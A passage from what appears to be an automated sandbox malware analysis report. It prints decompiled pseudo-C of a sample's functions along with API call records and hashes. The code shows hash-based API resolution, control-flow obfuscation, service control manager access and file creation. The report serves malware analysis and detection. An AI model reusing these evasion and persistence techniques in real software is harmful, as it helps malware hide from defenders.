				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x3ee494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x3ee494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x3edd18;
								if( *0x3edd18 == 0) {
									 *0x3edd18 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x3ee484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x3ee484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x3ee18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x3ee18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x3ee29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x4574c66, _t112);
											 *0x3ee29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x3ede08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x3ede08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x3ee494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x3ee494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x3edf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x3edf30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x3ee494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x3ee494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x3edf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x3edf30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x3ee270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x3ee270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x3ee200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x16d40839, _t112);
								 *0x3ee200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E003E42C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x003e5047
                                                                                0x003e504b
                                                                                0x003e504d
                                                                                0x003e5051
                                                                                0x003e5053
                                                                                0x003e5057
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e5060
                                                                                0x003e5060
                                                                                0x003e5060
                                                                                0x003e5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e51af
                                                                                0x003e51b5
                                                                                0x003e52f9
                                                                                0x003e52ff
                                                                                0x00000000
                                                                                0x003e5301
                                                                                0x003e5301
                                                                                0x003e5306
                                                                                0x003e5308
                                                                                0x003e531b
                                                                                0x003e5320
                                                                                0x003e5320
                                                                                0x003e5327
                                                                                0x003e532e
                                                                                0x003e5330
                                                                                0x003e5348
                                                                                0x003e5348
                                                                                0x003e5355
                                                                                0x003e5357
                                                                                0x003e5359
                                                                                0x003e535b
                                                                                0x003e535d
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e535b
                                                                                0x003e51bb
                                                                                0x003e51bb
                                                                                0x003e5277
                                                                                0x003e527c
                                                                                0x003e527e
                                                                                0x003e5291
                                                                                0x003e5296
                                                                                0x003e5296
                                                                                0x003e52ac
                                                                                0x003e52b0
                                                                                0x003e52b2
                                                                                0x003e52bd
                                                                                0x003e52c3
                                                                                0x003e52c5
                                                                                0x003e52d8
                                                                                0x003e52dd
                                                                                0x003e52dd
                                                                                0x003e52e6
                                                                                0x00000000
                                                                                0x003e51c1
                                                                                0x003e51c1
                                                                                0x003e51c7
                                                                                0x003e526d
                                                                                0x00000000
                                                                                0x003e51cd
                                                                                0x003e51cd
                                                                                0x003e51d3
                                                                                0x003e52e8
                                                                                0x003e52e8
                                                                                0x003e52ee
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e51d9
                                                                                0x003e51d9
                                                                                0x003e51de
                                                                                0x003e51e0
                                                                                0x003e51f3
                                                                                0x003e51f8
                                                                                0x003e51f8
                                                                                0x003e521b
                                                                                0x003e521d
                                                                                0x003e521f
                                                                                0x003e50ef
                                                                                0x003e50ef
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e5225
                                                                                0x003e5225
                                                                                0x003e522a
                                                                                0x003e522c
                                                                                0x003e523f
                                                                                0x003e5244
                                                                                0x003e5244
                                                                                0x003e5249
                                                                                0x003e524e
                                                                                0x003e525b
                                                                                0x003e525d
                                                                                0x003e525f
                                                                                0x003e5261
                                                                                0x003e5265
                                                                                0x00000000
                                                                                0x003e5265
                                                                                0x00000000
                                                                                0x003e521f
                                                                                0x003e51d3
                                                                                0x003e51c7
                                                                                0x003e51bb
                                                                                0x003e53c0
                                                                                0x003e53c0
                                                                                0x00000000
                                                                                0x003e53c0
                                                                                0x003e506c
                                                                                0x003e5367
                                                                                0x003e536c
                                                                                0x003e536e
                                                                                0x003e5381
                                                                                0x003e5386
                                                                                0x003e5386
                                                                                0x003e538d
                                                                                0x003e538f
                                                                                0x003e5394
                                                                                0x003e5396
                                                                                0x003e53a9
                                                                                0x003e53ae
                                                                                0x003e53ae
                                                                                0x00000000
                                                                                0x003e53b7
                                                                                0x003e5072
                                                                                0x003e5078
                                                                                0x003e50f9
                                                                                0x003e50ff
                                                                                0x003e5153
                                                                                0x003e5158
                                                                                0x003e515a
                                                                                0x003e516d
                                                                                0x003e5172
                                                                                0x003e5172
                                                                                0x003e5179
                                                                                0x003e517b
                                                                                0x003e5180
                                                                                0x003e5182
                                                                                0x003e5195
                                                                                0x003e519a
                                                                                0x003e519a
                                                                                0x003e51a3
                                                                                0x003e51a5
                                                                                0x00000000
                                                                                0x003e5101
                                                                                0x003e5101
                                                                                0x003e5107
                                                                                0x00000000
                                                                                0x003e510d
                                                                                0x003e510d
                                                                                0x003e5112
                                                                                0x003e5114
                                                                                0x003e5127
                                                                                0x003e512c
                                                                                0x003e512c
                                                                                0x003e5139
                                                                                0x003e513b
                                                                                0x003e513d
                                                                                0x003e514b
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e5107
                                                                                0x003e507a
                                                                                0x003e507a
                                                                                0x003e50c2
                                                                                0x003e50c7
                                                                                0x003e50c9
                                                                                0x003e50dc
                                                                                0x003e50e1
                                                                                0x003e50e1
                                                                                0x003e50ed
                                                                                0x00000000
                                                                                0x003e507c
                                                                                0x003e5082
                                                                                0x003e50ad
                                                                                0x003e50b0
                                                                                0x003e50b2
                                                                                0x003e50ba
                                                                                0x00000000
                                                                                0x003e5084
                                                                                0x003e508a
                                                                                0x00000000
                                                                                0x003e5090
                                                                                0x003e509a
                                                                                0x003e50a8
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e508a
                                                                                0x003e5082
                                                                                0x003e507a
                                                                                0x00000000
                                                                                0x003e5078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,003E8AC8,?,3251FEFE,?,?), ref: 003E5355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 133d7f2ca5510ac489f825c25ec4a53eaa06e005271f18bdac58970ca82bde36
                                                                                • Instruction ID: 35d7fc1f7d1e6bad15e6cd8394cd28a72521c73478c107b9ddd4e37f4ab40a6e
                                                                                • Opcode Fuzzy Hash: 133d7f2ca5510ac489f825c25ec4a53eaa06e005271f18bdac58970ca82bde36
                                                                                • Instruction Fuzzy Hash: 4681F532B447B58BDF22AF7B8C8572A36DE9B94748F020769F901DF2D1EA218D014BC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E9860, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E003E9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x3ee310;
							if( *0x3ee310 == 0) {
								 *0x3ee310 = E003E3E60(_t64, E003E3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x3ee54c; // 0x61e730
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x3edbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E003E3E60(_t64, E003E3F00(0xd9518805), 0x141622d6, _t94);
										 *0x3edbd8 = _t69;
									}
									_t53 =  *0x3ee54c; // 0x61e730
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E003E7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x3ee3f4;
											if(_t60 == 0) {
												_t60 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x3ee3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E003E3D00( &_v536);
											_t72 =  *0x3ee54c; // 0x61e730
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x3edbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E003E3E60(_t64, E003E3F00(0xd9518805), 0x141622d6, _t94);
								 *0x3edbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x3ee54c; // 0x61e730
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E003E3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x3ee494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x3ee494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x3edd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x3edd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x3ee54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E003E7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x3ee18c;
								if( *0x3ee18c == 0) {
									 *0x3ee18c = E003E3E60(_t64, E003E3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x3ee54c; // 0x61e730
									 *((intOrPtr*)(_t47 + 8)) = 0x3e7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x003e9868
                                                                                0x003e986a
                                                                                0x003e9871
                                                                                0x003e9875
                                                                                0x003e9875
                                                                                0x003e9878
                                                                                0x003e9880
                                                                                0x003e9880
                                                                                0x003e9880
                                                                                0x003e9880
                                                                                0x003e9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e988b
                                                                                0x003e9993
                                                                                0x003e9995
                                                                                0x003e99ad
                                                                                0x003e99ad
                                                                                0x003e99bb
                                                                                0x003e99bd
                                                                                0x003e99bf
                                                                                0x003e99c1
                                                                                0x003e99d8
                                                                                0x003e99c3
                                                                                0x003e99c3
                                                                                0x003e99c8
                                                                                0x003e99ce
                                                                                0x003e99ce
                                                                                0x00000000
                                                                                0x003e9891
                                                                                0x003e9891
                                                                                0x003e9896
                                                                                0x003e9936
                                                                                0x003e993b
                                                                                0x00000000
                                                                                0x003e9941
                                                                                0x003e9941
                                                                                0x003e9947
                                                                                0x003e9949
                                                                                0x003e9961
                                                                                0x003e9963
                                                                                0x003e9963
                                                                                0x003e9969
                                                                                0x003e997d
                                                                                0x003e997f
                                                                                0x003e9981
                                                                                0x003e9986
                                                                                0x00000000
                                                                                0x003e9986
                                                                                0x003e989c
                                                                                0x003e989c
                                                                                0x003e9927
                                                                                0x003e992c
                                                                                0x00000000
                                                                                0x003e98a2
                                                                                0x003e98a7
                                                                                0x003e9905
                                                                                0x003e990d
                                                                                0x003e9912
                                                                                0x003e991a
                                                                                0x00000000
                                                                                0x003e98a9
                                                                                0x003e98ae
                                                                                0x00000000
                                                                                0x003e98b4
                                                                                0x003e98b4
                                                                                0x003e98bb
                                                                                0x003e98ce
                                                                                0x003e98d3
                                                                                0x003e98d3
                                                                                0x003e98e4
                                                                                0x003e98ea
                                                                                0x003e98ef
                                                                                0x003e98f5
                                                                                0x003e98fb
                                                                                0x00000000
                                                                                0x003e98fb
                                                                                0x003e98ae
                                                                                0x003e98a7
                                                                                0x003e989c
                                                                                0x003e9896
                                                                                0x00000000
                                                                                0x003e988b
                                                                                0x003e99e2
                                                                                0x003e99e7
                                                                                0x003e9ae3
                                                                                0x003e9ae8
                                                                                0x003e9b02
                                                                                0x003e9b07
                                                                                0x003e9b09
                                                                                0x003e9b1c
                                                                                0x003e9b21
                                                                                0x003e9b21
                                                                                0x003e9b33
                                                                                0x003e9b35
                                                                                0x003e9b3e
                                                                                0x003e9b3e
                                                                                0x003e9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e99ed
                                                                                0x003e99ed
                                                                                0x003e9a73
                                                                                0x003e9a78
                                                                                0x003e9a7a
                                                                                0x003e9a8d
                                                                                0x003e9a92
                                                                                0x003e9a92
                                                                                0x003e9a99
                                                                                0x003e9a9b
                                                                                0x003e9aa0
                                                                                0x003e9aa2
                                                                                0x003e9ab5
                                                                                0x003e9aba
                                                                                0x003e9aba
                                                                                0x003e9ac7
                                                                                0x003e9ac9
                                                                                0x003e9ace
                                                                                0x003e9ad0
                                                                                0x003e9b4f
                                                                                0x003e9b58
                                                                                0x003e9ad2
                                                                                0x003e9ad2
                                                                                0x003e9ad9
                                                                                0x00000000
                                                                                0x003e9ad9
                                                                                0x003e99f3
                                                                                0x003e99f3
                                                                                0x003e99f8
                                                                                0x003e9a47
                                                                                0x003e9a49
                                                                                0x003e9a61
                                                                                0x003e9a61
                                                                                0x003e9a67
                                                                                0x003e9a69
                                                                                0x00000000
                                                                                0x003e99fa
                                                                                0x003e99fa
                                                                                0x003e99ff
                                                                                0x00000000
                                                                                0x003e9a05
                                                                                0x003e9a05
                                                                                0x003e9a0d
                                                                                0x003e9a12
                                                                                0x003e9a17
                                                                                0x003e9a1f
                                                                                0x003e9a24
                                                                                0x003e9a2c
                                                                                0x003e9a31
                                                                                0x003e9a38
                                                                                0x00000000
                                                                                0x003e9a38
                                                                                0x003e99ff
                                                                                0x003e99f8
                                                                                0x003e99ed
                                                                                0x00000000
                                                                                0x003e9aea
                                                                                0x003e9aea
                                                                                0x003e9aea
                                                                                0x003e9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0061E718), ref: 003E997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003E99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 003E9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 003E9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 0a$2S$Y4[0
                                                                                • API String ID: 2382770032-3624253954
                                                                                • Opcode ID: 6e858ea845305272d0ebb7195e93f94b04f317fc2d7a3c04a5650d1a42e61613
                                                                                • Instruction ID: 916a19c5f8574fb7e0b931f9e49c17a3ee4948f88f631a72d591ffa46bb52fd7
                                                                                • Opcode Fuzzy Hash: 6e858ea845305272d0ebb7195e93f94b04f317fc2d7a3c04a5650d1a42e61613
                                                                                • Instruction Fuzzy Hash: B361FA717042A59BD736AF6AAC857BA329DDBD0704F11066EF005DF3E1EA30CD058B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 3e8400-3e84df 106 3e84e3-3e84e9 105->106 107 3e84ef 106->107 108 3e85c8-3e85ce 106->108 109 3e866c-3e86b4 call 3eb6e0 107->109 110 3e84f5-3e84fb 107->110 111 3e8630-3e8637 108->111 112 3e85d0-3e85d6 108->112 124 3e85bd-3e85c7 109->124 131 3e86ba 109->131 116 3e84fd-3e8503 110->116 117 3e854a-3e8551 110->117 114 3e8639-3e864f call 3e3f00 call 3e3e60 111->114 115 3e8654-3e8667 111->115 118 3e85d8-3e85e0 112->118 119 3e85b1-3e85b7 112->119 114->115 115->106 125 3e8505-3e850b 116->125 126 3e8543-3e8548 116->126 122 3e856e-3e8591 117->122 123 3e8553-3e8569 call 3e3f00 call 3e3e60 117->123 127 3e85e2-3e85fa call 3e3f00 call 3e3e60 118->127 128 3e8600-3e8624 CreateFileW 118->128 119->106 119->124 146 3e85ae 122->146 147 3e8593-3e85a9 call 3e3f00 call 3e3e60 122->147 123->122 125->119 129 3e8511-3e8518 125->129 126->106 127->128 128->124 132 3e8626-3e862b 128->132 136 3e851a-3e8530 call 3e3f00 call 3e3e60 129->136 137 3e8535-3e8541 129->137 140 3e86bc-3e86be 131->140 141 3e86c4-3e86d1 131->141 132->106 136->137 137->106 140->124 140->141 146->119 147->146
                                                                                C-Code - Quality: 66%
                                                                                			E003E8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E003EB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x3edec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E003E3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E003E3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x3edec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x3ede3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E003E3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E003E3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x3ede3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x3ee1d4;
										if(_t93 == 0) {
											_t97 = E003E3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E003E3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x3ee1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x3ee3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E003E3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E003E3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x3ee3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x3ede04;
							if( *0x3ede04 == 0) {
								_t95 = E003E3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x3ede04 = E003E3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
